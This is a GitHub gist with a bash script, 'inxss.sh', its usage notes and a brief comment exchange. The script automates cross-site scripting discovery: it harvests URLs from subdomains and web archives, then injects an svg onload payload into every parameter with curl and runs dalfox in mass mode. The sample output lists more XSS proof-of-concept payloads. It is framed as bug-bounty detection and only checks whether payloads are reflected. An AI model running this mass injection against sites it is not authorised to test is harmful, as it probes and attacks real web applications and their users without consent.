Skip to content

Instantly share code, notes, and snippets.

@R0X4R

R0X4R/inxss.sh

Last active October 16, 2024 12:05
Show Gist options
  • Save R0X4R/7bcd28f12219518e36d5bbb1b18d563a to your computer and use it in GitHub Desktop.
Save R0X4R/7bcd28f12219518e36d5bbb1b18d563a to your computer and use it in GitHub Desktop.
Download ZIP
A fast xss detector script
Raw
inxss.sh
#!/bin/bash
#Requirements: KXSS(https://github.com/Emoe/kxss), Dalfox (https://github.com/hahwul/dalfox), QSreplace(https://github.com/tomnomnom/qsreplace)
#Preparation: subfinder -d target.tld -all -silent | httpx -silent | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o params.txt && cat params.txt | gf xss | sed "s/'/ /g" | sed "s/(/ /g" | sed "s/)/ /g" | qsreplace "FUZZ" 2> /dev/null | anew -q testparams.txt
#Usage: ./inxss.sh testparams.txt target.tld
lists=$1
mkout=$(echo -e "$2_$(date +%F_%H_%M_%S)")
mkdir -p $mkout
echo -e "Total $(cat $1 | wc -l) targets loaded"
sleep 6s
echo -e "[$(date +"%F %H:%M:%S")] Starting scan..."
SECONDS=0
xargs -a $1 -P 50 -I % bash -c "echo % | kxss" 2> /dev/null | grep -E "< >|\"" | anew -q $mkout/kxss.txt
cat $mkout/kxss.txt | grep -o '^.*Param' | sed 's/ Param\|URL\: //g' | anew -q $mkout/testdal.txt
cat $mkout/testdal.txt | qsreplace "\">/><svg/onload=confirm(document.domain)>" | xargs -P 50 -I % bash -c "curl -s -L -H \"X-Bugbounty: Testing\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" --insecure '%' | grep \"<svg/onload=confirm(document.domain)>\" && echo -e \"[POTENTIAL XSS] - % \n \"" 2> /dev/null | grep "POTENTIAL XSS" | anew -q $mkout/manuxss.txt &> /dev/null
dalfox file $mkout/testdal.txt pipe --silence --no-color --no-spinner --mass --mass-worker 100 --skip-bav -w 100 -H "X-Bugbounty: Testing" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36" 2> /dev/null | anew -q $mkout/dalfox.txt &> /dev/null
DURATION=$SECONDS
rm -rf $mkout/testdal.txt
echo -e "Scan completed, total $(($DURATION / 60)) min and $(($DURATION % 60)) seconds taken"
exit 1
Raw
usage.md

XSSIN

A fast xss detector script

#>Requirements

$ go get -u github.com/tomnomnom/qsreplace
$ go get github.com/tomnomnom/waybackurls
$ GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder
$ GO111MODULE=on go get -v github.com/projectdiscovery/httpx/cmd/httpx
$ GO111MODULE=on go get -u -v github.com/bp0lr/gauplus
$ go get -u github.com/tomnomnom/gf
$ go get -u github.com/tomnomnom/anew
$ GO111MODULE=on go get -v github.com/hahwul/dalfox/v2
$ go get github.com/Emoe/kxss

#>Preparation

$ subfinder -d target.tld -all -silent | httpx -silent | anew -q domains
$ cat domains | xargs -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q wayback.txt &> /dev/null
$ cat domains | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o gauplus.txt &> /dev/null
$ cat wayback.txt gauplus.txt | grep "target.tld" | sort -u | urldedupe -s | qsreplace "FUZZ" | gf xss | sed "s/'//g" | sed "s/(//g" | sed "s/)//g" | anew -q parameters &> /dev/null

#>Usage

$ chmod +x inxss.sh
$ ./inxss.sh parameters target.tld

#>Sample

usage:~ ./inxss.sh parameters target.tld

Total 350 targets loaded
[2021-07-17 15:13:16] Starting scan...
Scan completed, total 2 min and 17 seconds taken

usage:~ cd target.tld_2021-07-17_15_13_10/
usage/target.tld_2021-07-17_15_13_10:~ cat *

[POC][V][GET] http://target.tld:80/test/?p=FUZZ%22onpointerleave%3Dalert%281%29+class%3Ddalfox+
[POC][V][GET] http://target.tld:80/test/test.php?p=FUZZ%22%3E%3Cxmp%3E%3Cp+title%3D%22%3C%2Fxmp%3E%3Csvg%2Fonload%3Dalert%281%29+class%3Ddalfox%3E

URL: http://target.tld:80/test/?p=FUZZ Param: p Unfiltered: [" ' < >]
URL: http://target.tld:80/test/test.php?p=FUZZ Param: p Unfiltered: [" ' < >]

[POTENTIAL XSS] - http://target.tld:80/test/?p=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E
[POTENTIAL XSS] - http://target.tld:80/test/test.php?p=%22%3E%2F%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E
@geeknik
Copy link

geeknik commented Apr 19, 2022

Can I ask what the advantage is to running both gauplus and waybackurls? If I'm to understand correctly, gauplus already pulls data from waybackurls.

@R0X4R
Copy link
Author

R0X4R commented Apr 20, 2022

Can I ask what the advantage is to running both gauplus and waybackurls? If I'm to understand correctly, gauplus already pulls data from waybackurls.

Hey hi @geeknik,

Thanks for asking this question. I have found extra results while running both tools. I don't know what's the matter behind it but if you compare the results you'll definitely get some extra results.

@geeknik
Copy link

geeknik commented Apr 20, 2022

Excellent, thank you for sharing 👍🏻

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment